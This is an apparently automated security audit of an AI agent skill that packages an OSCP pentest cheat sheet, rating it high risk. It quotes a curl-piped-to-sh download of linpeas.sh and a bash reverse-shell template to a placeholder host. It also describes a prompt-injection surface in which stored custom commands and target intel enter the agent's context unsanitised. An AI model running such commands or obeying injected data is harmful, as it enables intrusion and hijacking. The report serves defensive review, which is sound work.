oscp-pentestcheatsheet-terminal

Fail

Audited by Gen Agent Trust Hub on Jun 12, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The file SKILL.md includes a command pattern that downloads a script from a remote source and pipes it directly to the shell for execution: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh. This execution method is highly dangerous as it bypasses local review and verification.
  • [COMMAND_EXECUTION]: The skill provides templates for high-risk commands, including reverse shells (bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1), privilege escalation, and credential extraction. While intended for authorized security testing, these represent dangerous operational patterns.
  • [EXTERNAL_DOWNLOADS]: The installation instructions direct users to clone and interact with a repository from an unverified third-party GitHub account: https://github.com/anshu19981/Pentestcheatsheet.git.
  • [PROMPT_INJECTION]: The skill has an indirect prompt injection surface through its 'Custom Commands' and 'Target Intel' features. These allow the ingestion of untrusted external data (into localStorage keys cs_customCommands and cs_targetIntel) which is then interpolated into the agent's context. There are no documented boundary markers or sanitization procedures to prevent malicious instructions embedded in this data from influencing the agent.
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 12, 2026, 08:51 PM
Security Audit — agent-trust-hub — oscp-pentestcheatsheet-terminal